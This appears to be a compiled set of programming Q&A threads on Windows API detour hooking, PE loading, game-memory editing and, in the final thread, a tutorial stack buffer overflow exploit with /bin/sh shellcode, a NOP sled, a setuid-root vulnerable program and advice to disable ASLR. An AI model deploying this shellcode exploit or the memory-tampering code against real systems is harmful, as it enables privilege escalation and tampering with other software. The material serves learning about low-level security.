Trying to understand a detour (hooking) function - c++

Hi I'm trying to understand a function, it's about Windows API hooking. I'm trying to hook LoadLibraryA to see if any cheats are trying to inject into my game. For that I'm trying to intercept any calls to LoadLibraryA.
I tried to write comments to explain what I think is going on, but I'm unsure about the latter parts
// src = address of LoadLibraryA in kernel32.dll,
// dst = my function prototype of LoadLibraryA
// len = 5, as we allocate a JMP instruction (0xE9)
PVOID Detour(BYTE* src, const BYTE* dst, const int len)
{
BYTE* jmp = (BYTE*)malloc(len + 5); // allocate 10 bytes
DWORD oldProtection; // change protection of 5 bytes starting from LoadLibraryA in kernel32.dll
VirtualProtect(src, len, PAGE_EXECUTE_READWRITE, &oldProtection); // Changes the protection on a region of committed pages in the virtual address space of the calling process.
memcpy(jmp, src, len); // save 5 first bytes of the start of LoadLibraryA in kernel32.dll from src to jmp
jmp += len; // start from byte 6
jmp[0] = 0xE9; // insert jump from byte 6 - 10:
// jmp looks like this currently: [8BFF] = 2 bytes [55] = 1 byte [8BEC] = 2 bytes [0xE9] = 5 bytes
// ??
*(DWORD*)(jmp + 1) = (DWORD)(src + len - jmp) - 5; // ?
// ??
src[0] = 0xE9;
*(DWORD*)(src + 1) = (DWORD)(dst - src) - 5; // ?
// Set the same memory protection as before.
VirtualProtect(src, len, oldProtection, &oldProtection);
// ??
return (jmp - len);
}
Below is the representation before the hook and after.
Before:
After:

The function works fine, just need help in understanding whats going on in the later part > of the function. I'm unsure what happens from here jmp += len;
First thing I notice is your code is doing the detour and the jmp back all in one go, which is different than I usually see people do it.
memcpy(jmp, src, len);
You're copying the stolen bytes to the location of your shellcode
jmp is the address you're jumping to
jmp += len;
length is the number of stolen bytes, or bytes you overwrite which are copied to the area you jmp too, because you must still execute them. So your advancing to the byte directly following your relative jmp in your shellcode
jmp[0] = 0xE9;
You're writing the relative jump instruction
(DWORD)(jmp + 1) = (DWORD)(src + len - jmp) - 5;
jmp + 1 = the address after the jmp instruction where you need to place the relative address
(src + len - jmp) - 5 is the equation required to get the relative address
src[0] = 0xE9;
(DWORD)(src + 1) = (DWORD)(dst - src) - 5;
You're doing the same thing you did inside your shellcode except you're just creating the detour to it in this case.
return (jmp - len);
You're returning the address of the shellcode (this is kinda weird but you have to do this because your code did jmp +=len)

Related

how to store PE32+ preferred imageBase address?

I have this PE loader that works really fine with 32bit PEs but with x64 ones it can't allocate the 0X0000000140000000 preferred base address since it only reads it as 0X40000000.
Here is how I allocate that address:
DWORD hdr_image_base = p_NT_HDR->OptionalHeader.ImageBase;
char* ImageBase = (char*)VirtualAlloc((void*)hdr_image_base, size_of_image, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
but when I hardcode the address It works just fine:
char* ImageBase = (char*)VirtualAlloc((void*)0X140000000, size_of_image, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
Is DWORD not enough to store the address?
this reallocation code is stripping some variable-length somewhere since it still works with 32 but not with x64:
//this is how much we shifted the ImageBase
DWORD_PTR delta_VA_reloc = (reinterpret_cast<DWORD_PTR>(ImageBase)) - p_NT_HDR->OptionalHeader.ImageBase;
// if there is a relocation table, and we actually shitfted the ImageBase
if (data_directory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0 && delta_VA_reloc != 0) {
printf("\n[*] The relocated address is not the prefered address, started relocating\n");
//calculate the relocation table address
IMAGE_BASE_RELOCATION* p_reloc = (IMAGE_BASE_RELOCATION*)(ImageBase + data_directory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
//once again, a null terminated array
while (p_reloc->VirtualAddress != 0) {
// how many relocations in this block
// ie the total size, minus the size of the "header", divided by 2 (those are words, so 2 bytes for each)
//std::cout << sizeof(WORD) << "\n"; sizeof word is 2
DWORD size = (p_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);
// the first relocation element in the block, right after the header (using pointer arithmetic again)
WORD* reloc = (WORD*)(p_reloc + 1);
for (int i = 0; i < size; ++i) {
//type is the first 4 bits of the relocation word
int type = reloc[i] >> 12;
// offset is the last 12 bits
unsigned long long int offset = reloc[i] & 0x0fff;
//printf("--------------- %#llx\n", offset);
//this is the address we are going to change
DWORD* change_addr = (DWORD*)(ImageBase + p_reloc->VirtualAddress + offset);
// there is only one type used that needs to make a change
// When you relocate you should look if the flag HIGHT_LOW is active for PE32 and DIR64 for PE32+
switch (type) {
case IMAGE_REL_BASED_HIGHLOW://for x86
*change_addr += delta_VA_reloc;
break;
case IMAGE_REL_BASED_DIR64://for x64
*change_addr += delta_VA_reloc;
break;
default:
break;
}
}
// switch to the next relocation block, based on the size
p_reloc = (IMAGE_BASE_RELOCATION*)((reinterpret_cast<DWORD_PTR>(p_reloc)) + p_reloc->SizeOfBlock);
}
}

C++ How to take value from EXE + Pointer + Offset + Offset?

I'm learning to modifying game values using C++ but now I'm stuck.
I know how to edit for example FLOAT value of Player speed:
uintptr_t _EntitiesBase = (uintptr_t)GetModuleHandle(L"EntitiesMP.dll");
uintptr_t EntityBase = _EntitiesBase + 0x3153D0;
DWORD Run = 0xDE4;
*(FLOAT*)(*(DWORD*)EntityBase + Run) = Value;
But I don't know, how to edit values, that have much offsets (Engine.dll + 0xD52AB0 + 0x48 + 0x228), because in the end it return wrong value, not that I wanted to change
For example, in Cheat Engine, the same thing looks like this:
I added Engine.dll + 0xD52AB0 as a pointer, and next add offset 0x48 and offset 0x220 and it gives me address 2DC7E488, that contains FLOAT value, that I need to change
Do you have any ideas?
You can use ReadProcessMemory to read process memory and WriteProcessMemory to write process memory. to do this you just need to use ReadProcessMemory for every offset then write the pointer value with WriteProcessMemory:-
uintptr_t entitybase;
uintptr_t value1;
float newValue = 100000;
ReadProcessMemory(ProcessHandle, (uintptr_t)EngineDllHandle + 0xD52AB0, &entitybase, sizeof(entitybase), 0);
ReadProcessMemory(ProcessHandle, entitybase + 0x48, &value1, sizeof(value1), 0);
WriteProcessMemory(ProcessHandle, value1 + 0x220, &newValue, sizeof(entitybase), 0);

Changing Value of a Register using C++

I'm trying to change an integer value of a register using C++.
This is what I've got...
DWORD_PTR* value_pointer= NULL;
__asm
{
MOV [value_pointer], esp
}
// Create a pointer so we can modify the integer value stored in ESP, via value_pointer...
// We do +0x10 because the address is actually +0x10 ahead, I just couldn't compile the code using MOV [value_pointer], DWORD PTR SS:[ESP+0x10]
// Assume ESP+0x10 holds an integer value of 8
char* adjustable_value_pointer = ((char*)value_pointer + 0x10);
adjustable_value_pointer += 4;
Now if we assumed that ESP+0x10 originally held an integer value of 8, then when ESP+0x10 is referenced again (in assembly) after this code runs the value should now be 12, not 8.
But this doesn't seem to work for me...
Any help please?!
value_pointer should be a DWORD_PTR instead of a DWORD_PTR*, and you don't need to declare a new pointer, you can just use array indexing with value_pointer as the base (and adjust the index according to the stride):
value_pointer[4] += 4;
Will add the size of 4 DWORDs (0x16 bytes) to value_pointer, and access the memory at that address.

Calculating offset for hotpatching/inline function hooking

From http://lastfrag.com/hotpatching-and-inline-hooking-explained/,
Q1) Does code proceed from high memory to low memory or vice versa?
Q2) More importantly, during the calculation of the replacement offset, why is it that you have to minus the function preamble? Is it because the offset starts from the end of the instruction and not the beginning?
DWORD ReplacementAddressOffset = ReplacementAddress - OriginalAddress - 5;
Full Code:
void HookAPI(wchar_t *Module, char *API, DWORD Function)
{
HMODULE hModule = LoadLibrary(Module);
DWORD OriginalAddress = (DWORD)GetProcAddress(hModule, API);
DWORD ReplacementAddress = (DWORD)Function;
DWORD ReplacementAddressOffset = ReplacementAddress - OriginalAddress - 5;
LPBYTE pOriginalAddress = (LPBYTE)OriginalAddress;
LPBYTE pReplacementAddressOffset = (LPBYTE)(&ReplacementAddressOffset);
DWORD OldProtect = 0;
DWORD NewProtect = PAGE_EXECUTE_READWRITE;
VirtualProtect((PVOID)OriginalAddress, 5, NewProtect, &OldProtect);
for (int i = 0; i < 5; i++)
Store[i] = pOriginalAddress[i];
pOriginalAddress[0] = (BYTE)0xE9;
for (int i = 0; i < 4; i++)
pOriginalAddress[i + 1] = pReplacementAddressOffset[i];
VirtualProtect((PVOID)OriginalAddress, 5, OldProtect, &NewProtect);
FlushInstructionCache(GetCurrentProcess(), NULL, NULL);
FreeLibrary(hModule);
}
Q3) In this code, the relative address of a jmp instruction is being replaced; relAddrSet is a pointer to the original destination; to is a pointer to the new destination. I don't understand the calculation of the to address, why is it that you have to add the original destination to the functionForHook + opcodeOffset?
DWORD *relAddrSet = (DWORD *)(currentOpcode + 1);
DWORD_PTR to = (*relAddrSet) + ((DWORD_PTR)functionForHook + opcodeOffset);
*relAddrSet = (DWORD)(to - ((DWORD_PTR)originalFunction + opcodeOffset));
Yes the relative address is the the offset after the instructions, that's why you have to substract 5.
But, in my opinion, you should just forget the idea of the relative jump and try absolute jump.
Why ? Because it is a lot easier and x86-64 compatible (relative jumps are limited to +/-2GB).
The absolute jump is (x64) :
48 b8 ef cd ab 89 67 45 23 01 mov rax, 0x0123456789abcdef
ff e0 jmp rax
And for x86 :
b8 67 45 23 01 mov eax, 0x01234567
ff e0 jmp eax
Here is the modified code (the loader is now 7 bytes instead of 5):
void HookAPI(wchar_t *Module, char *API, DWORD Function)
{
HMODULE hModule = LoadLibrary(Module);
DWORD OriginalAddress = (DWORD)GetProcAddress(hModule, API);
DWORD OldProtect = 0;
DWORD NewProtect = PAGE_EXECUTE_READWRITE;
VirtualProtect((PVOID)OriginalAddress, 7, NewProtect, &OldProtect);
memcpy(Store, OriginalAddress, 7);
memcpy(OriginalAddress, "\xb8\x00\x00\x00\x00\xff\xe0", 7);
memcpy(OriginalAddress+1, &ReplacementAddress, sizeof(void*));
VirtualProtect((PVOID)OriginalAddress, 7, OldProtect, &NewProtect);
FlushInstructionCache(GetCurrentProcess(), NULL, NULL);
FreeLibrary(hModule);
}
The code is the same for x64 but you have to add 2 nops (90) at the beginning or the end in order match the size of the following instructions, so the loader is "\x48\xb8<8-bytes addr>\xff\xe0\x90\x90" (14 bytes)
Q1) The program runs from lower to highest addresses (i.e. the program counter gets increased by the size of each instruction, unless in case of jumps, calls or ret). But I am probably missing the point of the question.
Q2) Yes, on x86 the jumps are executed after the program counter has been increased by the size of the jump instruction (5 bytes); when the CPU adds the jump offset to the program counter to calculate the target address, the program counter has already been increased of 5.
Q3) This code is quite weird, but it may work. I suppose that *relAddrset initially contains a jump offset to originalFunction (i.e. *relAddSet==originalFunction-relativeOffset). If this is true, the final result is that *reladdrSet contains a jump offset to functionFoHook. Indeed the last instruction becomes:
*relAddrSet=(originalFunction-relativeOffset)+functionForHook-originalFunction
== functionForHook-relativeOffset
Yes, code runs "forward" if I understand this question correctly. One instruction is executed after another if it is not branching.
An instruction that does a relative jump (JMP, CALL) does the jump relative to the start of the next instruction. That's why you have to subtract the length of the instruction (here: 5) from the difference.
I can't answer your third question. Please give some context and what the code is supposed to do.

bufferover exploit not working on gcc

I was trying to run this buffer overflow exploit on a vulnerable code vuln.c on gcc (I found this on some tutorial and code is not mine).The shellcode spawns a shell.
exploit.c code
#include <stdlib.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";
unsigned long sp(void) // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
offset = 0; // Use an offset of 0
esp = sp(); // Put the current stack pointer into esp
ret = esp - offset; // We want to overwrite the ret address
printf("Stack pointer (ESP) : 0x%x\n", esp);
printf(" Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);
// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);
// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }
// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }
// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }
// End the string
buffer[600-1] = 0;
// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);
// Free the buffer memory
free(buffer);
return 0;
}
This exploit is for the vulnerable code vuln.c:
int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}
But when I run it using ./exploit it gives a segmentation fault instead of opening the shell.I used the commands:
sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit
It shows the result:
(gdb) run
Starting program: /home/a/exploit
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln
Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax 0x0 0
ecx 0xbfe3f5a0 -1075579488
edx 0xbfe3dca8 -1075585880
ebx 0xb76e4ff4 -1217507340
esp 0xbfe3dc60 0xbfe3dc60
ebp 0xbffff338 0xbffff338
esi 0x0 0
edi 0x0 0
eip 0xbffff338 0xbffff338
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
Please tell me where the problem lies...
Your problem lies in the address you are jumping to....
That exploit does NOT use memory leaks, so it is supposed to be run in a system that does not support ASLR.
Once ASLR is disabled in your system, you have to run the exploit N times until jumping to the right shellcode address...
Function sp() returns the esp on this process, but it may change depending on the backtrace and the process... so you will have to increment a value until reaching the right address.....
Conclusion:
disable ASLR
add an offset getting iterated each time and add it to the esp value before is used
Good luck!!!!